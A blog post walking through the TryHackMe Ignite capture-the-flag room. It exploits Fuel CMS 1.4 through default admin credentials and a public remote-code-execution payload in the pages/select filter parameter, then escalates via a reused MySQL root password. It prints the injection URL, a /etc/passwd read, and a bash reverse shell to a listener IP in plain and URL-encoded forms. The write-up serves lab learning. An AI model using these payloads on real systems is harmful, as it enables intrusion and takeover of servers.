narancs's blog

TryHackMe – Ignite walkthrough

TryHackMe Ignite logo

Introduction

This is a post about the Ignite CTF room on TryHackMe. During this CTF we need to do web enumeration, then exploit Fuel CMS using a CVE and finally escalate our privileges to root.

Enumeration

After deploying the machine, I did a scan with nmap to see what ports are open.

Apache HTTP server is running on port 80, and nmap also found that there is a disallowed entry (/fuel/) in robots.txt file.

After visiting the website, we see the starting page of Fuel CMS.

The page reveals that the installed version of Fuel CMS is 1.4 and if we scroll down, then we can find the default login credentials as well.

Exploitation

To login we need to go to /fuel page.

The default credentials were not changed, so we can login as admin with password: admin. Now we have access to the dashboard of Fuel CMS.

I looked around on the dashboard, but I did not find anything that would allow me to run a reverse shell or get access to the host in other ways. Then I started looking for known exploits for this particular version of Fuel CMS, and I found the following on exploit-db: https://www.exploit-db.com/exploits/49487

Using CVE from Exploit DB

I checked the exploit code and tried to understand how it works. The script requires 2 command line arguments: the base path of Fuel CMS and the command that will be executed on the target. The command is stored in a variable called cmd, and it is inserted into a GET URL parameter of /fuel/pages/select/ page.

				
					url = root_url + "/fuel/pages/select/?filter='%2Bpi(print(%24a%3D'system'))%2B%24a('#{cmd}')%2B'"
				
			

To check if this installation is vulnerable for this exploit, I replaced the ‘#{cmd}’ variable with the command ‘cat /etc/passwd’. Then I opened the page in my browser. The final URL looks like this:

				
					http://10.10.220.45/fuel/pages/select/?filter='%2Bpi(print(%24a%3D'system'))%2B%24a('cat /etc/passwd')%2B'
				
			

After checking the source code of the page, the content of the passwd file was included at the top, so the exploit worked.

Getting a shell

The next step was to run a reverse shell from the GET parameter in a similar way. There was a small problem, because the command included in the URL caused a syntax error on the page, so the reverse shell was not executed. To resolve this issue, I had to URL encode the Linux command that runs the revere shell.

The bash reverse shell I used:

				
					/bin/bash -c "bash -i >& /dev/tcp/10.9.8.61/1337 0>&1"
				
			

URL encoded with Burp Suite Decoder module:

				
					%2f%62%69%6e%2f%62%61%73%68%20%2d%63%20%22%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%39%2e%38%2e%36%31%2f%31%33%33%37%20%30%3e%26%31%22
				
			

Final URL:

				
					http://10.10.220.45/fuel/pages/select/?filter='%2Bpi(print(%24a%3D'system'))%2B%24a('%2f%62%69%6e%2f%62%61%73%68%20%2d%63%20%22%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%39%2e%38%2e%36%31%2f%31%33%33%37%20%30%3e%26%31%22')%2B'
				
			

I started a netcat listener on port 1337, and after opening the above URL, the listener received the connection and I had a shell on the target machine as www-data user.

This shell has limited functionality, so I upgraded to a fully functional shell.

I started looking for the user flag. I checked the home directories, only www-data had one and the flag was there.

Privilege escalation

One of the first things I checked was the database connection configuration file. On this host it was located at /var/www/html/fuel/application/config/database.php. This file contained the password for the root user for MySQL server.

The same password was used for the Linux root user as well. I was able to switch to root and get the root flag.

Summary

During the Ignite CTF on TryHackMe I was able to exploit a vulnerable version of Fuel CMS. There was a public exploit available on Exploit DB, that allowed me to get initial access to the target machine. Then I escalated my privileges to root, that was possible due to a critical password reuse. The root user for MySQL database and the Linux root user had the same passwords.

Table of Contents

Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments

Related posts

0
Would love your thoughts, please comment.x
()
x